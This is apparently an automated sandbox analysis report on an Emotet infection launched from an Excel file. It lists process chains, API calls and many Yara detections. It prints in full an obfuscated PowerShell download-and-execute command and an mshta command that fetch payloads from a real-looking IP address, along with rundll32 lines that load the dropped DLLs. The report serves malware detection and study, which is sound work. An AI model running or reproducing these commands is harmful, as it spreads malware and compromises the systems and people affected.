                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10002280 SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,SetLastError,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError,9_2_10002280
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_10037657
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_1002F81E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer,9_2_1003B89A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter,9_2_1003B8BC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_1003ACCC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_10037657
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_1002F81E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer,11_2_1003B89A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter,11_2_1003B8BC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_1003ACCC
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta http://91.240.118.168/qqw/aas/se.htmlJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADDJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADDJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServerJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Wlnljconerohcjaz\cekfidpy.yhq",MOdnuTnMIiJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Wlnljconerohcjaz\cekfidpy.yhq",DllRegisterServerJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gdtjuon\eryfdrtz.qpz",NSMcfMaGRbKFCLJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gdtjuon\eryfdrtz.qpz",DllRegisterServerJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Mqenzhvktn\czphbxmqtcm.nzb",NscZMRYpRiEJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Mqenzhvktn\czphbxmqtcm.nzb",DllRegisterServerJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Oyfgrjdbgbuk\aagpsdybai.shx",DwOwDiNvSbJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Oyfgrjdbgbuk\aagpsdybai.shx",DllRegisterServerJump to behavior
                            Source: Yara matchFile source: DETAILS-145.xls, type: SAMPLE
                            Source: Yara matchFile source: C:\Users\user\Desktop\DETAILS-145.xls, type: DROPPED
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,9_2_1003F570
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,9_2_10043730
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,9_2_10014B71
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,11_2_1003F570
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,11_2_10043730
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,11_2_10014B71
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003DAA7 cpuid 9_2_1003DAA7
                            Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003906D GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,9_2_1003906D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003CE1A __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,9_2_1003CE1A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100453C8 GetVersion,GetVersion,GetVersion,GetVersion,GetVersion,RegisterClipboardFormatA,9_2_100453C8

                            Stealing of Sensitive Information

                            barindex
                            Yara detected Emotet
                            Source: Yara matchFile source: 17.2.rundll32.exe.2a0000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2810000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 18.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.140000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2f40000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2380000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2380000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 19.2.rundll32.exe.230000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2ed0000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.380000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.25f0000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2320000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.23e0000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 19.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.910000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.3d0000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2e80000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.a40000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.380000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 19.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2f30000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.a70000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.5f0000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2670000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2860000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.25c0000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2590000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.25f0000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2410000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2f40000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2e40000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.7a0000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.24d0000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.a60000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2350000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.28e0000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.26b0000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 18.2.rundll32.exe.240000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2280000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2e50000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.3d0000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2ed0000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.820000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.26b0000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2e20000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.31d0000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.8a0000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2fd0000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.ae0000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.1d0000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.23d0000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.910000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2960000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.220000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2250000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2eb0000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2730000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.220000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.1b0000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.3170000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.a40000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.170000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.23d0000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2350000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.770000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 18.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.7a0000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.ae0000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.370000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.a60000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2f30000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2e40000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.400000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.8e0000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.27a0000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2960000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.23e0000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2e70000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.400000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.3d0000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.28e0000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.370000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.8e0000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2590000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.140000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.22b0000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.22b0000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.910000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.27a0000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 18.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2e50000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 19.2.rundll32.exe.10000000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000000C.00000002.574709897.0000000000230000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.522412460.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.574966326.0000000000911000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.521968966.0000000000400000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.521762770.0000000000221000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.575355954.00000000024D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000002.682108397.0000000000231000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.522161075.0000000002381000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.522361954.0000000002861000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.522256343.0000000002731000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.673081131.00000000002A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.616094913.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.577991543.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.522563448.0000000002E71000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.522208158.00000000026B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.575698621.0000000002671000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.675215228.0000000002E21000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.675330890.0000000002E81000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.677230667.0000000010001000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.522291162.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.575069937.0000000002281000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.575241988.0000000002381000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.575278324.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000012.00000002.678452410.0000000000241000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.524549461.0000000000180000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.673490791.0000000002251000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.616750004.0000000002E40000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.616484887.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000002.687313669.0000000010001000.00000020.00000001.01000000.00000010.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.616301764.00000000008A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.673601215.0000000002811000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.675278836.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.616955117.0000000002F40000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.673042649.0000000000220000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.577507576.0000000000380000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.616430850.0000000000A71000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.616392195.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.521709838.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.615957746.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.521942436.00000000003D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000012.00000002.678978438.0000000010001000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.525704176.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
